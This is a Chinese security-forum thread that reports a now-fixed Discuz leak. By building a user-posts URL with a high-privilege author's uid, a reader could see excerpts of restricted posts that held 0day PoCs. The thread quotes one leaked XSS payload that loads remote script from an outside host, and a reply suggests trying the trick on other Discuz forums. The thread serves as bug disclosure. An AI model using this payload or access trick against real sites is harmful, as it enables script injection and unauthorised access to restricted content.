导航

[【Bugs反馈】] 255权限帖子部分内容泄漏(可白嫖0day哟)~(已修复)

#1
看完0xShe师傅分享的越权,我又不死心瞅了瞅论坛的功能,诶,好巧不巧,又发现了一个信息泄露,还挺严重的。

其实挺简单的,我没测试普通权限,感觉是大家都可以操作。问题出在个人中心的主题页面,就这个地址:https://www.t00ls.com/my.php?item=posts&uid=xxx

只要找到高权限的文章作者,获取其uid,然后拼接上面的url,访问即可。比如从WEB代码审计板块可以找到不少255权限的帖子,

然后访问拼接后的url即可


这里是否会泄漏poc,有偶然成分,它泄漏的字符较少,如果发帖人直接就贴poc那铁定gg。 我举个例子:

有志者、事竟成,破釜沉舟
<Img Src=//x.is OnLoad=import(src)>

评分记录

打赏/拍砖记录

  • 0xShe 2023-06-20 16:01:39 打赏 +1 TuBi:细啊细啊
2023-06-20
#2
好像注册会员以上才有的权限,也是DZ的原生问题,已经修复。
T00.ls:https://t00.ls/t00ls
T00ls官方Telegram公开频道:https://t.me/T00lsCom
T00ls官方Telegram群:https://t.me/T00lsTB
T00ls官方Twitter:https://twitter.com/T00lsCom
2023-06-20
#3
回复 2# t00ls管理团队01
是的是的,我也验证了一下,确实得注册会员。
2023-06-20
#4
现在还有用吗?。
2023-06-20
#5
这波举一反三是学到了,现场学思路现场挖,跟src看报告出货一样
2023-06-21
#6
啊啊啊啊,来晚了一步好像看看255权限的帖子
2023-06-21
#7
晚了一步,错失0day
2023-06-21
#8
这么说其他dz论坛有这个问题了。是不是可以看看其他论坛有没有好东西
2023-06-26
#9
错失了一个机会啊
2023-06-26
#10
不是说只针对版主得吗。。